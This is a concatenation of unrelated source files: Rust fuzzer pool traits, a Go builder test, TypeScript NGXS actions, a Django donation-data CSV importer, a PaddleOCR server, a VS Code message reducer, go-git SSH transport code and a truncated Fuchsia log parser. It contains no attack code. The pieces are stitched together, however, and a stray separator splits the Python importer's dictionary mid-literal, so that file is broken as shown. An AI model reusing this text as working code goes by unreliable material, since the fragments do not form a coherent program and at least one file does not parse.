type Wrapped = M;
#[no_coverage]
fn wrapped_mutator(&self) -> &Self::Wrapped {
self.as_ref()
}
}
#[derive(Default, Clone, Copy)]
pub struct EmptyStats;
impl Display for EmptyStats {
#[no_coverage]
fn fmt(&self, _f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
Ok(())
}
}
#[derive(Debug)]
pub struct CorpusDelta<T, Idx> {
pub path: PathBuf,
pub add: Option<(T, Idx)>,
pub remove: Vec<Idx>,
}
impl<T, Idx> CorpusDelta<T, Idx> {
#[no_coverage]
pub fn convert<U>(self, convert_f: impl FnOnce(T) -> U) -> CorpusDelta<U, Idx> {
CorpusDelta {
path: self.path,
add: self.add.map(
#[no_coverage]
|(x, idx)| (convert_f(x), idx),
),
remove: self.remove,
}
}
#[no_coverage]
pub fn fuzzer_event(&self) -> FuzzerEvent {
if self.add.is_some() {
if self.remove.is_empty() {
FuzzerEvent::New
} else {
FuzzerEvent::Replace(self.remove.len())
}
} else {
if self.remove.is_empty() {
FuzzerEvent::None
} else {
FuzzerEvent::Remove(self.remove.len())
}
}
}
}
pub trait TestCase: Clone {
fn generation(&self) -> usize;
}
pub trait Sensor {
type ObservationHandler<'a>;
fn start_recording(&mut self);
fn stop_recording(&mut self);
fn iterate_over_observations(&mut self, handler: Self::ObservationHandler<'_>);
}
pub trait Pool {
type TestCase: TestCase;
type Index: Hash + Eq + Clone + Copy;
type Stats: Default + Display + Clone;
fn len(&self) -> usize;
fn stats(&self) -> Self::Stats;
fn get_random_index(&mut self) -> Option<Self::Index>;
fn get(&self, idx: Self::Index) -> &Self::TestCase;
fn get_mut(&mut self, idx: Self::Index) -> &mut Self::TestCase;
fn retrieve_after_processing(&mut self, idx: Self::Index, generation: usize) -> Option<&mut Self::TestCase>;
fn mark_test_case_as_dead_end(&mut self, idx: Self::Index);
fn minify(
&mut self,
target_len: usize,
event_handler: impl FnMut(CorpusDelta<&Self::TestCase, Self::Index>, Self::Stats) -> Result<(), std::io::Error>,
) -> Result<(), std::io::Error>;
}
pub trait CompatibleWithSensor<S: Sensor>: Pool {
fn process(
&mut self,
sensor: &mut S,
get_input_ref: Either<Self::Index, &Self::TestCase>,
clone_input: &impl Fn(&Self::TestCase) -> Self::TestCase,
complexity: f64,
event_handler: impl FnMut(CorpusDelta<&Self::TestCase, Self::Index>, Self::Stats) -> Result<(), std::io::Error>,
) -> Result<(), std::io::Error>;
}
local_test.go | /*
* Copyright 2020 ZUP IT SERVICOS EM TECNOLOGIA E INOVACAO SA
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package builder
import (
"errors"
"path/filepath"
"testing"
"github.com/ZupIT/ritchie-cli/pkg/formula"
"github.com/ZupIT/ritchie-cli/pkg/formula/repo"
"github.com/ZupIT/ritchie-cli/pkg/formula/tree"
"github.com/ZupIT/ritchie-cli/pkg/stream"
"github.com/ZupIT/ritchie-cli/pkg/stream/streams"
)
func TestBuild(t *testing.T) {
workspacePath := filepath.Join(tmpDir, "ritchie-formulas-test")
formulaPath := filepath.Join(tmpDir, "ritchie-formulas-test", "testing", "formula")
fileManager := stream.NewFileManager()
dirManager := stream.NewDirManager(fileManager)
defaultTreeManager := tree.NewGenerator(dirManager, fileManager)
repoProviders := formula.NewRepoProviders()
repoCreator := repo.NewCreator(ritHome, repoProviders, dirManager, fileManager)
repoLister := repo.NewLister(ritHome, fileManager)
repoWriter := repo.NewWriter(ritHome, fileManager)
repoListWrite := repo.NewListWriter(repoLister, repoWriter)
repoDeleter := repo.NewDeleter(ritHome, repoListWrite, dirManager)
repoDetail := repo.NewDetail(repoProviders)
repoListWriteCreator := repo.NewCreateWriteListDetailDeleter(repoLister, repoCreator, repoWriter, repoDetail, repoDeleter)
repoAdder := repo.NewAdder(ritHome, repoListWriteCreator, defaultTreeManager)
_ = dirManager.Remove(workspacePath)
_ = dirManager.Create(workspacePath)
zipFile := filepath.Join("..", "..", "..", "testdata", "ritchie-formulas-test.zip")
_ = streams.Unzip(zipFile, workspacePath)
type in struct {
formulaPath string
dirManager stream.DirCreateListCopyRemover
repo formula.RepositoryAdder
}
tests := []struct {
name string
in in
want error
}{
{
name: "success",
in: in{
formulaPath: formulaPath,
dirManager: dirManager,
repo: repoAdder,
},
want: nil,
},
{
name: "success build without build.sh",
in: in{
formulaPath: filepath.Join(tmpDir, "ritchie-formulas-test", "testing", "without-build-sh"),
dirManager: dirManager,
repo: repoAdder,
},
want: nil,
},
{
name: "create dir error",
in: in{
formulaPath: formulaPath,
dirManager: dirManagerMock{createErr: errors.New("error to create dir")},
},
want: errors.New("error to create dir"),
},
{
name: "copy workspace dir error",
in: in{
formulaPath: formulaPath,
dirManager: dirManagerMock{data: []string{"linux"}, copyErr: errors.New("error to copy dir")},
},
want: errors.New("error to copy dir"),
},
{
name: "dir remove error",
in: in{
formulaPath: formulaPath,
dirManager: dirManagerMock{data: []string{"commons"}, removeErr: errors.New("error to remove dir")},
repo: repoAdder,
},
want: errors.New("error to remove dir"),
},
{
name: "repo add error",
in: in{
formulaPath: formulaPath,
dirManager: dirManager,
repo: repoAdderMock{err: errors.New("error to add repo")},
},
want: errors.New("error to add repo"),
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
builderManager := NewBuildLocal(ritHome, tt.in.dirManager, tt.in.repo)
info := formula.BuildInfo{FormulaPath: tt.in.formulaPath, Workspace: formula.Workspace{Name: "repo", Dir: workspacePath}}
got := builderManager.Build(info)
if (tt.want != nil && got == nil) || got != nil && got.Error() != tt.want.Error() {
t.Errorf("Build(%s) got %v, want %v", tt.name, got, tt.want)
}
if tt.want == nil {
hasRitchieHome := dirManager.Exists(ritHome)
if !hasRitchieHome {
t.Errorf("Build(%s) did not create the Ritchie home directory", tt.name)
}
treeLocalFile := filepath.Join(ritHome, "repos", "local-repo", "tree.json")
hasTreeLocalFile := fileManager.Exists(treeLocalFile)
if !hasTreeLocalFile {
t.Errorf("Build(%s) did not copy the tree local file", tt.name)
}
formulaFiles := filepath.Join(ritHome, "repos", "local-repo", "testing", "formula", "bin")
files, err := fileManager.List(formulaFiles)
if err == nil && len(files) != 4 {
t.Errorf("Build(%s) did not generate bin files", tt.name)
}
configFile := filepath.Join(ritHome, "repos", "local-repo", "testing", "formula", "config.json")
hasConfigFile := fileManager.Exists(configFile)
if !hasConfigFile {
t.Errorf("Build(%s) did not copy formula config", tt.name)
}
}
})
}
}
type dirManagerMock struct {
data []string
createErr error
listErr error
copyErr error
removeErr error
}
func (d dirManagerMock) Create(string) error {
return d.createErr
}
func (d dirManagerMock) List(string, bool) ([]string, error) {
return d.data, d.listErr
}
func (d dirManagerMock) Copy(string, string) error {
return d.copyErr
}
func (d dirManagerMock) Remove(string) error {
return d.removeErr
}
type repoAdderMock struct {
err error
}
func (r repoAdderMock) Add(repo formula.Repo) error {
return r.err
}
orgs.actions.ts | import { OrganizationRequest, Project, UpdateMembersRequest } from '@compito/api-interfaces';
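// Action classes in the NGXS/Redux style: each class carries a unique `type` string and its payload.
// Hypothetical usage: store.dispatch(new OrgsAction.Get(orgId));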
export namespace OrgsAction {
export class Add {
static readonly type = '[Orgs] Add org';
constructor(public payload: OrganizationRequest) {}
}
export class AddProject {
static readonly type = '[Orgs] Add project';
constructor(public payload: Project, public orgId: string) {}
}
export class DeleteProject {
static readonly type = '[Orgs] Delete project';
constructor(public projectId: string, public orgId: string) {}
}
export class Update {
static readonly type = '[Orgs] Update Org';
constructor(public id: string, public payload: OrganizationRequest) {}
}
export class Delete {
static readonly type = '[Orgs] Delete Org';
constructor(public id: string) {}
}
export class GetAll {
static readonly type = '[Orgs] Get All';
}
export class GetInvites {
static readonly type = '[Orgs] Get Invites';
}
export class AcceptInvite {
static readonly type = '[Orgs] Accept Invites';
constructor(public id: string) {}
}
export class RejectInvite {
static readonly type = '[Orgs] Reject Invites';
constructor(public id: string) {}
}
export class UpdateMembers {
static readonly type = '[Orgs] Update members';
constructor(public id: string, public payload: UpdateMembersRequest) {}
}
export class Get {
static readonly type = '[Orgs] Get org';
constructor(public id: string) {}
}
}
historical_data_importer.py | import re
from dateutil.parser import parse
from django.utils import timezone as tz
from .base_csv_importer import BaseCsvImporter
from app.constants.item_map import ITEM_MAP
from app.enums import ItemStatusEnum
from app.models import Donor, Donation, Item, ItemDevice, ItemDeviceType
class HistoricalDataImporter(BaseCsvImporter):
"""Takes 10b format file path and imports into the database using the 10x
format into the appropriate tables.
:param str csvfile: csvfile path
"""
bulk_model = Item
def parse_row(self, row):
donor = self._goc_donor(self._parse_donor(row))
donation = self._goc_donation(self._parse_donation(row), donor)
device_type = self._goc_device_type(self._parse_device_type(row))
device = self._goc_item_device(
self._parse_item_device(row), device_type)
self.model_bulk.append(
self._new_item(self._parse_item(row), donation, device))
def _parse_donor(self, row):
"""Takes a row and parses relevant Donor data into a dict.
:param dict row: A CSV row dict
:return: Donor related data dict
:rtype: dict
"""
receipt_option_f = {
"notneeded": "REFUSED",
"email": "EMAIL",
"mail": "MAIL"
}.get(re.sub("[^a-zA-Z]+", "", row["TRV"]).lower(), "EMAIL")
documented_at_f = self._parse_date(row["Date"])
postal_f = re.sub("[^a-zA-Z0-9 ]+", "", row["Postal Code"]).upper()[:7]
return {
"donor_name": row["Donor Name"],
"contact_name": row.get("Contact", row["Donor Name"]),
"email": row["Email"],
"want_receipt": receipt_option_f,
"telephone_number": row["Telephone"],
"mobile_number": row["Mobile"],
"address_line_one": row["Address"],
"address_line_two": row.get("Unit", ""),
"city": row["City"],
"province": row["Prov."],
"postal_code": postal_f,
"customer_ref": row["CustRef"],
"documented_at": documented_at_f
}
def _parse_donation(self, row):
"""Takes a csv row and parses relevant Donation data into a dict.
:param dict row: A CSV row dict
:return: Donation related data dict
:rtype: dict
"""
donate_date_f = documented_at_f = self._parse_date(row["Date"])
return {
"tax_receipt_no": row["TR#"],
"pledge_date": donate_date_f,
"donate_date": donate_date_f,
"test_date": donate_date_f,
"valuation_date": donate_date_f,
"pick_up": row["PPC"],
"source": "HISTORICAL_DATA", # Fixed
"documented_at": documented_at_f,
"tax_receipt_created_at": tz.now()
}
def _parse_device_type(self, row):
"""Takes a csv row and parses relevant ItemDeviceType data into a dict.
:param dict row: A CSV row dict
:return: ItemDeviceType related data dict
:rtype: dict
"""
dtype = ITEM_MAP.get(row["Item Description"].lower(), None)
if dtype is None:
return {
"category": "not categorized",
"device_type": row["Item Description"],
}
return dtype
def _parse_item_device(self, row):
"""Takes a csv row and parses relevant ItemDevice data into a dict.
:param dict row: A CSV row dict
:return: ItemDevice related data dict
:rtype: dict
"""
return {
"make": row["Manufacturer"],
"model": row["Model"],
"cpu_type": "",
"speed": "",
"memory": None,
"hd_size": None,
"screen_size": "",
"hdd_serial_number": "",
"operating_system": ""
}
def _parse_item(self, row):
"""Takes a csv row and parses relevant Item data into a dict.
:param dict row: A CSV row dict
:return: Item related data dict
:rtype: dict
"""
working_f = row["Working"].lower() == "y"
donate_date_f = documented_at_f = self._parse_date(row["Date"])
batch_f = "" if row["Batch"] == "0" else row["Batch"]
particulars_f = row["Item Particulars"]
if particulars_f == "0":
particulars_f = ""
qty_f = int(row.get("Qty", 0))
try:
value_f = float(re.sub("[^0-9|.]", "", row["Value"]))
except ValueError:
value_f = 0.0
# Guard against a zero quantity (row.get("Qty", 0) defaults to 0)
value_per_f = round(value_f / qty_f, 2) if qty_f else 0.0
return {
"serial_number": "",
"asset_tag": "",
"particulars": particulars_f, | "quantity": row["Qty"],
"working": working_f,
"condition": row["Condition"],
"quality": row["Quality"],
"batch": batch_f,
"value": str(value_per_f),
"verified": True,
"documented_at": documented_at_f,
"status": ItemStatusEnum.RECEIVED.name,
"notes": particulars_f,
"valuation_date": donate_date_f,
# "weight":
# "valuation_supporting_doc":
}
def _goc_donor(self, data):
"""get_or_create a Donor.
:param dict row: A Donor dict
:return: Donor object
:rtype: app.models.Donor instance
"""
try:
donor = Donor.objects.filter(
donor_name=data['donor_name'],
contact_name=data['contact_name'],
email=data['email'],
want_receipt=data['want_receipt'],
telephone_number=data['telephone_number'],
mobile_number=data['mobile_number'],
address_line_one=data['address_line_one'],
address_line_two=data['address_line_two'],
city=data['city'],
province=data['province'],
postal_code=data['postal_code'],
).first()
if donor is None:
raise Donor.DoesNotExist
except Exception:
donor = Donor.objects.create(**data)
return donor
def _goc_donation(self, data, donor):
"""get_or_create a Donation.
:param dict row: A Donation dict
:param obj donor: app.model.Donor object
:return: Donation object
:rtype: app.models.Donation instance
"""
try:
# Match by tax receipt number rather than full donation data
d = Donation.objects.get(tax_receipt_no=data.get("tax_receipt_no"))
except Exception:
d = Donation.objects.create(donor=donor, **data)
return d
def _goc_device_type(self, data):
"""get_or_create a ItemDeviceType.
:param dict row: A ItemDeviceType dict
:return: ItemDeviceType object
:rtype: app.models.ItemDeviceType instance
"""
dtype, unique = ItemDeviceType.objects.get_or_create(**data)
return dtype
def _goc_item_device(self, data, dtype):
"""get_or_create a ItemDevice.
:param dict row: A ItemDevice dict
:param obj device_type: app.model.ItemDeviceType object
:return: ItemDevice object
:rtype: app.models.ItemDevice instance
"""
i, unique = ItemDevice.objects.get_or_create(dtype=dtype, **data)
return i
def _new_item(self, data, donation, device):
"""Initialize a new Item object.
:param dict row: A Item dict
:param obj donation: app.model.Donation object
:param obj device: app.model.ItemDevice object
:return: Item object
:rtype: app.models.Item instance
"""
try:
i = Item(donation=donation, device=device, **data)
i.clean_fields()
except Exception as e:
self.logger.error(f"Item Data: {i.underscore_serialize()}")
raise e
return i
@staticmethod
def _parse_date(date_f):
""" Takes dynamic date formats and unifies them into Y-m-d format
"""
date = parse(date_f, dayfirst=True)
return date.strftime('%Y-%m-%d')
ocr_local_server.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle_serving_client import Client
from paddle_serving_app.reader import OCRReader
import cv2
import sys
import numpy as np
import os
from paddle_serving_app.reader import Sequential, URL2Image, ResizeByFactor
from paddle_serving_app.reader import Div, Normalize, Transpose
from paddle_serving_app.reader import DBPostProcess, FilterBoxes, GetRotateCropImage, SortedBoxes
if sys.argv[1] == 'gpu':
from paddle_serving_server_gpu.web_service import WebService
elif sys.argv[1] == 'cpu':
from paddle_serving_server.web_service import WebService
from paddle_serving_app.local_predict import Debugger
import time
import re
import base64
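# Inferred from the sys.argv checks above, the server is started as:
#   python ocr_local_server.py cpu   (or: gpu)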
class OCRService(WebService):
def init_det_debugger(self, det_model_config):
self.det_preprocess = Sequential([
ResizeByFactor(32, 960), Div(255),
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]), Transpose(
(2, 0, 1))
])
self.det_client = Debugger()
if sys.argv[1] == 'gpu':
self.det_client.load_model_config(
det_model_config, gpu=True, profile=False)
elif sys.argv[1] == 'cpu':
self.det_client.load_model_config(
det_model_config, gpu=False, profile=False)
self.ocr_reader = OCRReader()
def preprocess(self, feed=[], fetch=[]):
data = base64.b64decode(feed[0]["image"].encode('utf8'))
data = np.frombuffer(data, np.uint8)  # frombuffer replaces the deprecated fromstring
im = cv2.imdecode(data, cv2.IMREAD_COLOR)
ori_h, ori_w, _ = im.shape
det_img = self.det_preprocess(im)
_, new_h, new_w = det_img.shape
det_img = det_img[np.newaxis, :]
det_img = det_img.copy()
det_out = self.det_client.predict(
feed={"image": det_img}, fetch=["concat_1.tmp_0"])
filter_func = FilterBoxes(10, 10)
post_func = DBPostProcess({
"thresh": 0.3,
"box_thresh": 0.5,
"max_candidates": 1000,
"unclip_ratio": 1.5,
"min_size": 3
})
sorted_boxes = SortedBoxes()
ratio_list = [float(new_h) / ori_h, float(new_w) / ori_w]
dt_boxes_list = post_func(det_out["concat_1.tmp_0"], [ratio_list])
dt_boxes = filter_func(dt_boxes_list[0], [ori_h, ori_w])
dt_boxes = sorted_boxes(dt_boxes)
get_rotate_crop_image = GetRotateCropImage()
img_list = []
max_wh_ratio = 0
for i, dtbox in enumerate(dt_boxes):
boximg = get_rotate_crop_image(im, dt_boxes[i])
img_list.append(boximg)
h, w = boximg.shape[0:2]
wh_ratio = w * 1.0 / h
max_wh_ratio = max(max_wh_ratio, wh_ratio)
if len(img_list) == 0:
return [], []
_, w, h = self.ocr_reader.resize_norm_img(img_list[0],
max_wh_ratio).shape
imgs = np.zeros((len(img_list), 3, w, h)).astype('float32')
for id, img in enumerate(img_list):
norm_img = self.ocr_reader.resize_norm_img(img, max_wh_ratio)
imgs[id] = norm_img
feed = {"image": imgs.copy()}
fetch = ["ctc_greedy_decoder_0.tmp_0", "softmax_0.tmp_0"]
return feed, fetch
def postprocess(self, feed={}, fetch=[], fetch_map=None):
rec_res = self.ocr_reader.postprocess(fetch_map, with_score=True)
res_lst = []
for res in rec_res:
res_lst.append(res[0])
res = {"res": res_lst}
return res
ocr_service = OCRService(name="ocr")
ocr_service.load_model_config("ocr_rec_model")
ocr_service.prepare_server(workdir="workdir", port=9292)
ocr_service.init_det_debugger(det_model_config="ocr_det_model")
if sys.argv[1] == 'gpu':
ocr_service.run_debugger_service(gpu=True)
elif sys.argv[1] == 'cpu':
ocr_service.run_debugger_service()
ocr_service.run_web_service()
postOffice.ts | // Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
'use strict';
import * as Redux from 'redux';
import {
IInteractiveWindowMapping,
InteractiveWindowMessages
} from '../../../client/datascience/interactive-common/interactiveWindowTypes';
import { CssMessages, SharedMessages } from '../../../client/datascience/messages';
import { PostOffice } from '../../react-common/postOffice';
// Action types for Incoming messages. Basically all possible messages prefixed with the word 'action'
// This allows us to have a reducer for an incoming message and a separate reducer for an outgoing message.
// Note: Couldn't figure out a way to just generate this from the keys of the InteractiveWindowMessages.
// String literals can't be generated by concatenating other string literals.
export enum IncomingMessageActions {
// tslint:disable-next-line: prefer-template
STARTCELL = 'action.start_cell',
FINISHCELL = 'action.finish_cell',
UPDATECELL = 'action.update_cell',
GOTOCODECELL = 'action.gotocell_code',
COPYCODECELL = 'action.copycell_code',
RESTARTKERNEL = 'action.restart_kernel',
EXPORT = 'action.export_to_ipynb',
GETALLCELLS = 'action.get_all_cells',
RETURNALLCELLS = 'action.return_all_cells',
DELETECELL = 'action.delete_cell',
DELETEALLCELLS = 'action.delete_all_cells',
UNDO = 'action.undo',
REDO = 'action.redo',
EXPANDALL = 'action.expand_all',
COLLAPSEALL = 'action.collapse_all',
STARTPROGRESS = 'action.start_progress',
STOPPROGRESS = 'action.stop_progress',
INTERRUPT = 'action.interrupt',
SUBMITNEWCELL = 'action.submit_new_cell',
UPDATESETTINGS = 'action.update_settings',
DOSAVE = 'action.DoSave',
SENDINFO = 'action.send_info',
STARTED = 'action.started',
ADDEDSYSINFO = 'action.added_sys_info',
REMOTEADDCODE = 'action.remote_add_code',
REMOTEREEXECUTECODE = 'action.remote_reexecute_code',
ACTIVATE = 'action.activate',
SHOWDATAVIEWER = 'action.show_data_explorer',
GETVARIABLESREQUEST = 'ACTION.GET_VARIABLES_REQUEST',
GETVARIABLESRESPONSE = 'action.get_variables_response',
GETVARIABLEVALUEREQUEST = 'action.get_variable_value_request',
GETVARIABLEVALUERESPONSE = 'action.get_variable_value_response',
VARIABLEEXPLORERTOGGLE = 'action.variable_explorer_toggle',
PROVIDECOMPLETIONITEMSREQUEST = 'action.provide_completion_items_request',
CANCELCOMPLETIONITEMSREQUEST = 'action.cancel_completion_items_request',
PROVIDECOMPLETIONITEMSRESPONSE = 'action.provide_completion_items_response',
PROVIDEHOVERREQUEST = 'action.provide_hover_request',
CANCELHOVERREQUEST = 'action.cancel_hover_request',
PROVIDEHOVERRESPONSE = 'action.provide_hover_response',
PROVIDESIGNATUREHELPREQUEST = 'action.provide_signature_help_request',
CANCELSIGNATUREHELPREQUEST = 'action.cancel_signature_help_request',
PROVIDESIGNATUREHELPRESPONSE = 'action.provide_signature_help_response',
RESOLVECOMPLETIONITEMREQUEST = 'action.resolve_completion_item_request',
CANCELRESOLVECOMPLETIONITEMREQUEST = 'action.cancel_completion_items_request',
RESOLVECOMPLETIONITEMRESPONSE = 'action.resolve_completion_item_response',
ADDCELL = 'action.add_cell',
EDITCELL = 'action.edit_cell',
REMOVECELL = 'action.remove_cell',
SWAPCELLS = 'action.swap_cells',
INSERTCELL = 'action.insert_cell',
LOADONIGASMASSEMBLYREQUEST = 'action.load_onigasm_assembly_request',
LOADONIGASMASSEMBLYRESPONSE = 'action.load_onigasm_assembly_response',
LOADTMLANGUAGEREQUEST = 'action.load_tmlanguage_request',
LOADTMLANGUAGERESPONSE = 'action.load_tmlanguage_response',
OPENLINK = 'action.open_link',
SHOWPLOT = 'action.show_plot',
STARTDEBUGGING = 'action.start_debugging',
STOPDEBUGGING = 'action.stop_debugging',
GATHERCODE = 'action.gather_code',
LOADALLCELLS = 'action.load_all_cells',
LOADALLCELLSCOMPLETE = 'action.load_all_cells_complete',
SCROLLTOCELL = 'action.scroll_to_cell',
REEXECUTECELL = 'action.reexecute_cell',
NOTEBOOKIDENTITY = 'action.identity',
NOTEBOOKDIRTY = 'action.dirty',
NOTEBOOKCLEAN = 'action.clean',
SAVEALL = 'action.save_all',
NATIVECOMMAND = 'action.native_command',
VARIABLESCOMPLETE = 'action.variables_complete',
NOTEBOOKRUNALLCELLS = 'action.notebook_run_all_cells',
NOTEBOOKRUNSELECTEDCELL = 'action.notebook_run_selected_cell',
NOTEBOOKADDCELLBELOW = 'action.notebook_add_cell_below',
RENDERCOMPLETE = 'action.finished_rendering_cells',
FOCUSEDCELLEDITOR = 'action.focused_cell_editor',
MONACOREADY = 'action.monaco_ready',
GETCSSREQUEST = 'action.get_css_request',
GETCSSRESPONSE = 'action.get_css_response',
GETMONACOTHEMEREQUEST = 'action.get_monaco_theme_request',
GETMONACOTHEMERESPONSE = 'action.get_monaco_theme_response',
UPDATEKERNEL = 'action.update_kernel',
LOCINIT = 'action.loc_init'
}
export const AllowedMessages = [
...Object.values(InteractiveWindowMessages),
...Object.values(CssMessages),
...Object.values(SharedMessages)
];
// Actions created from messages
export function createPostableAction<M extends IInteractiveWindowMapping, T extends keyof M = keyof M>(
message: T,
payload?: M[T]
): Redux.AnyAction {
return { type: `${message}`, payload };
}
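// Hypothetical usage, with a store whose reducer was built by generatePostOfficeSendReducer below:
// store.dispatch(createPostableAction(InteractiveWindowMessages.Undo));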
export function generatePostOfficeSendReducer(postOffice: PostOffice): Redux.Reducer<{}, Redux.AnyAction> {
// tslint:disable-next-line: no-function-expression
return function(_state: {} | undefined, action: Redux.AnyAction): {} {
// Make sure a valid message
if (AllowedMessages.find(k => k === action.type)) {
// Just post this to the post office.
// tslint:disable-next-line: no-any
postOffice.sendMessage<IInteractiveWindowMapping>(action.type, action.payload);
}
// We don't modify the state.
return {};
};
}
common.go | // Package ssh implements the SSH transport protocol.
package ssh
import (
"context"
"fmt"
"reflect"
"strconv"
"github.com/dink10/go-git.v4/plumbing/transport"
"github.com/dink10/go-git.v4/plumbing/transport/internal/common"
"github.com/kevinburke/ssh_config"
"golang.org/x/crypto/ssh"
"golang.org/x/net/proxy"
)
// DefaultClient is the default SSH client.
var DefaultClient = NewClient(nil)
// DefaultSSHConfig is the reader used to access parameters stored in the
// system's ssh_config files. If nil all the ssh_config are ignored.
var DefaultSSHConfig sshConfig = ssh_config.DefaultUserSettings
type sshConfig interface {
Get(alias, key string) string
}
// NewClient creates a new SSH client with an optional *ssh.ClientConfig.
func NewClient(config *ssh.ClientConfig) transport.Transport {
return common.NewClient(&runner{config: config})
}
// DefaultAuthBuilder is the function used to create a default AuthMethod, when
// the user doesn't provide any.
var DefaultAuthBuilder = func(user string) (AuthMethod, error) {
return NewSSHAgentAuth(user)
}
const DefaultPort = 22
type runner struct {
config *ssh.ClientConfig
}
func (r *runner) Command(cmd string, ep *transport.Endpoint, auth transport.AuthMethod) (common.Command, error) {
c := &command{command: cmd, endpoint: ep, config: r.config}
if auth != nil {
c.setAuth(auth)
}
if err := c.connect(); err != nil {
return nil, err
}
return c, nil
}
type command struct {
*ssh.Session
connected bool
command string
endpoint *transport.Endpoint
client *ssh.Client
auth AuthMethod
config *ssh.ClientConfig
}
func (c *command) setAuth(auth transport.AuthMethod) error {
a, ok := auth.(AuthMethod)
if !ok {
return transport.ErrInvalidAuthMethod
}
c.auth = a
return nil
}
func (c *command) Start() error {
return c.Session.Start(endpointToCommand(c.command, c.endpoint))
}
// Close closes the SSH session and connection.
func (c *command) Close() error {
if !c.connected {
return nil
}
c.connected = false
//XXX: If the full packfile was read, then the session might already be
// closed.
_ = c.Session.Close()
return c.client.Close()
}
// connect connects to the SSH server. Unless an AuthMethod was set with the
// SetAuth method, it defaults to an auth method based on PublicKeysCallback,
// which connects to an SSH agent using the address stored in the SSH_AUTH_SOCK
// environment variable.
func (c *command) connect() error {
if c.connected {
return transport.ErrAlreadyConnected
}
if c.auth == nil {
if err := c.setAuthFromEndpoint(); err != nil {
return err
}
}
var err error
config, err := c.auth.ClientConfig()
if err != nil {
return err
}
overrideConfig(c.config, config)
c.client, err = dial("tcp", c.getHostWithPort(), config)
if err != nil {
return err
}
c.Session, err = c.client.NewSession()
if err != nil {
_ = c.client.Close()
return err
}
c.connected = true
return nil
}
func dial(network, addr string, config *ssh.ClientConfig) (*ssh.Client, error) {
var (
ctx = context.Background()
cancel context.CancelFunc
)
if config.Timeout > 0 {
ctx, cancel = context.WithTimeout(ctx, config.Timeout)
} else {
ctx, cancel = context.WithCancel(ctx)
}
defer cancel()
conn, err := proxy.Dial(ctx, network, addr)
if err != nil {
return nil, err
}
c, chans, reqs, err := ssh.NewClientConn(conn, addr, config)
if err != nil {
return nil, err
}
return ssh.NewClient(c, chans, reqs), nil
}
func (c *command) getHostWithPort() string {
if addr, found := c.doGetHostWithPortFromSSHConfig(); found {
return addr
}
host := c.endpoint.Host
port := c.endpoint.Port
if port <= 0 {
port = DefaultPort
}
return fmt.Sprintf("%s:%d", host, port)
}
func (c *command) doGetHostWithPortFromSSHConfig() (addr string, found bool) {
if DefaultSSHConfig == nil {
return
}
host := c.endpoint.Host
port := c.endpoint.Port
configHost := DefaultSSHConfig.Get(c.endpoint.Host, "Hostname")
if configHost != "" {
host = configHost
found = true
}
if !found {
return
}
configPort := DefaultSSHConfig.Get(c.endpoint.Host, "Port")
if configPort != "" {
if i, err := strconv.Atoi(configPort); err == nil {
port = i
}
}
addr = fmt.Sprintf("%s:%d", host, port)
return
}
func (c *command) setAuthFromEndpoint() error {
var err error
c.auth, err = DefaultAuthBuilder(c.endpoint.User)
return err
}
func endpointToCommand(cmd string, ep *transport.Endpoint) string {
return fmt.Sprintf("%s '%s'", cmd, ep.Path)
}
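// overrideConfig copies every field of overrides onto c via reflection, so a
// caller-supplied ssh.ClientConfig completely replaces the auth-derived one.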
func overrideConfig(overrides *ssh.ClientConfig, c *ssh.ClientConfig) {
if overrides == nil {
return
}
t := reflect.TypeOf(*c)
vc := reflect.ValueOf(c).Elem()
vo := reflect.ValueOf(overrides).Elem()
for i := 0; i < t.NumField(); i++ {
f := t.Field(i)
vcf := vc.FieldByName(f.Name)
vof := vo.FieldByName(f.Name)
vcf.Set(vof)
}
*c = vc.Interface().(ssh.ClientConfig)
}
message.rs | // Copyright 2020 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
use super::buffer::Accounted;
use super::error::StreamError;
use byteorder::{ByteOrder, LittleEndian};
use fidl_fuchsia_logger::LogMessage;
use fuchsia_zircon as zx;
use libc::{c_char, c_int};
use std::{mem, str};
pub const METADATA_SIZE: usize = mem::size_of::<fx_log_metadata_t>();
pub const MIN_PACKET_SIZE: usize = METADATA_SIZE + 1;
pub const MAX_DATAGRAM_LEN: usize = 2032;
pub const MAX_TAGS: usize = 5;
pub const MAX_TAG_LEN: usize = 64;
/// A type-safe(r) [`LogMessage`].
///
/// [`LogMessage`]: https://fuchsia.dev/reference/fidl/fuchsia.logger#LogMessage
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct Message {
/// Size this message took up on the wire.
pub size: usize,
/// Message severity reported by the writer.
pub severity: fx_log_severity_t,
/// Timestamp reported by the writer.
pub time: zx::Time,
/// Process koid as reported by the writer.
pub pid: zx::sys::zx_koid_t,
/// Thread koid as reported by the writer.
pub tid: zx::sys::zx_koid_t,
/// Number of logs the writer had to drop before writing this message.
pub dropped_logs: usize,
/// Tags annotating the context or semantics of this message.
pub tags: Vec<String>,
/// The message's string contents.
pub contents: String,
}
impl Accounted for Message {
fn bytes_used(&self) -> usize {
self.size
}
}
impl Message {
/// Parse the provided buffer as if it implements the [logger/syslog wire format].
///
/// Note that this is distinct from the parsing we perform for the debuglog, which also
/// takes a `&[u8]`, and is why we don't implement this as `TryFrom`.
///
/// [logger/syslog wire format]: https://fuchsia.googlesource.com/fuchsia/+/master/zircon/system/ulib/syslog/include/lib/syslog/wire_format.h
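///
/// Sketch of the expected layout (derived from the parsing below): 32 bytes of
/// little-endian metadata (pid, tid, time, severity, dropped_logs), then
/// length-prefixed tags, then a nul-terminated message.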
